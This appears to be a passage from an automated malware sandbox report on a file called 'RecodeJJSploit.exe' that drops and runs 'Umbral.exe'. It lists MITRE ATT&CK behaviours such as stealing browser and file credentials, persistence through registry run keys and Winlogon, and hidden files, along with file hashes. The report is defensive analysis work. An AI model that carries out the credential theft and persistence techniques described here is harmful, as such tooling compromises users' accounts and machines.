-
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\Desktop\RecodeJJSploit.exe"C:\Users\Admin\Desktop\RecodeJJSploit.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50388540355a351f0f503fa63764f91da
SHA17da660f59bb3a43c42a6f53e1228f4b28a096d6f
SHA256c61790bd6142ffa61ec89621e55df61b925dabf668bb1f70eb70965a4ab4079c
SHA512d645259e0ced7820c0a95d20275d9beb9ac75eeb133012f6a9e8f3267240bc958d0477c28af8ea71380723b087d62b3efc8b8f563f96e57568df267e3160c364
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD583d94e8aa23c7ad2db6f972739506306
SHA1bd6d73d0417971c0077f772352d2f538a6201024
SHA256dfa5cbd243b304f47196c492bc2d8b29941a550c2f076ef8bdfca72755e71881
SHA5124224625e8ef8dadc72f1e1a1edfe2079656b14f2af94ce6128316481d96e9d0b6edf4de13fcdcc182038a2b29eb562b9246f944aecebfcb7c5ee8d7936b6287e
-
Filesize
948B
MD5a372fe4de974869a249a69ec7d412f21
SHA15bc149f953ff9b8f591a545f02e6d25c54bc35c9
SHA256a4f25dbb512f3b28843935f0af2e458a53d7816350e1cd1aa5f4495fe82cce90
SHA512614522b5b8ac67a6075792dbf9655eaf5c3e7812ee785c5f3c6fff9b8e5a78810ee2f976594ef547f29d1cd087908c5ea97f83d9c106eacfe982a66bd1bf4370
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD543a63637614b06cf4ca7e1b85c25b071
SHA11fefef7f0dfef9f9ba248f168a0c85314f5f4053
SHA2560f3ec5a874fe41abd67013b8481610202272468333616bf098ced19c1f271e6b
SHA5126396d789420a8a13367483ec6d7f288e437cf75527f11132285738587ce549f95587c32c56d023008b5725e465a76da244093707079b13216c057a550b4cc1d0
-
Filesize
64B
MD56f75687be47c8d0295e49b7152e3ff24
SHA1760f681c811c3cb6a2aaf236d8f3f724e89d201e
SHA256acbf15bb6f61dc352b62acd5ebda3fddb6e79d8973dd2a7cc7339924493c02de
SHA512a445607fab0309575f7ae4f8e4ddf01dacbfb3daba0ea646d8fefabb0f519dae5ce2ab620457288a76e289b33d552efdce02517d1bbb1bb71b7d35981bac2824
-
Filesize
1KB
MD55e22dd1cda88782a1f52f76e748ef957
SHA13231826619a06fa541e2bfb21da445bd7013b5ac
SHA25673302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec
SHA51275039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498
-
Filesize
948B
MD580f40afdcf16513f9f729bde83727443
SHA1048f904817a4ec90571fbd59386d1d16af0a5d03
SHA2565cd4fed2d8062c33d1ded379ed72dd1a2d2871b2e697b4f2179f01f3a6f835af
SHA512fb4a3b54505b6dd35d05131fbb1ea58371f81db7de8177423de52a42b38c1495c18638ced0fa1e53c30c7fc95a7d60b251125913d092304062ef5703c950d826
-
Filesize
1KB
MD53f227fa0b699f9a30db777271d1d24f1
SHA13264aba29af8868dd0638dd5bd0791d9234012dc
SHA256b5fca526f30753b464b1fc9fcf0d0b85feaa066abdfaab39f9b6bc2d6d58a3e6
SHA51244ded679e98d87babf6c45d3e416b0de4c1e154ffbc65fd66f5ef1611a1f67885d59328d16465f1e7593e378b08f4e19ee726cffcc583e9e0cd9c38fc0b0a2d1
-
Filesize
1KB
MD51bc7686851b3d27c54cf1b21a96ed7e4
SHA1cd4ab9f573016bfd92e8c6f56a655a335f13af4a
SHA256b40ace76124ee9af00d9b1731b9937dacabe1f9fac012083305ccf9dc0ff5254
SHA51253ede4d3b13bbe5b242d3927719af1448936fddfebc41d26f2c7dfe1ca0edcd5d24736c669ad7ed989219d42a0628babdea5fb8cc0092a2d599307febea8d77c
-
Filesize
10.0MB
MD5d5d2e3c5614a7d174d6a402f8261f4da
SHA1acd83341f400a38e8efd1921e4d219bd6a90277e
SHA256b4446a0710b742eabcd47708aba123e2acab13ecba33756e1fc0a1e2c771a2f0
SHA512e0f4974c000c61f33d396fef817b656de8d6cd41663cb2072ff689fa6e9dcd87fa441adaa9055c73854d14650141358d8785c2d5b78eb69265cbaafaf73814c9
-
Filesize
231KB
MD56666c618cfef7187d04f9eb7d0cda700
SHA13a3ae164b936113dd895dc1d6bf69ff8e13b4ebe
SHA256591be99ca233dc0bfb5e64b9fc22309c7019f401375aa2fcf0fc87ef3789c371
SHA51210b100b9c8d173a1d340e76325b2a52273ef9121c2b560f80d26e785606e60a5a291d9df3f80b442b0ab9e0a5368344881beca4236d604021a74a78ba1acc3ce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
10.3MB
MD5779e78c27d9bc8c7fb68e25a7799cad0
SHA1b5e8956f6d6b0ad63f275bf09c41d0f6429a098a
SHA2564f0bfb2c0b27a170aee3698f475e73fdb6aee18b6f79595b1af65198807ec95f
SHA512757e2e3e763f385d39a5033132002c7456173fa0a3a67fc010519b71f2f53a2fb710cc7f49999f89f3e1e7b44b99fcab212ace1c414894a85a9d4b315e7c7727
-
Filesize
2KB
MD54028457913f9d08b06137643fe3e01bc
SHA1a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6
-
Filesize
10.3MB
-
Filesize
1020KB
-
Filesize
40KB
-
Filesize
72KB
-
Filesize
256KB
-
Filesize
120KB
-
Filesize
320KB
-
Filesize
472KB
-
Filesize
10.3MB
-
Filesize
448KB
-
Filesize
8KB
-
Filesize
10.3MB
-
Filesize
136KB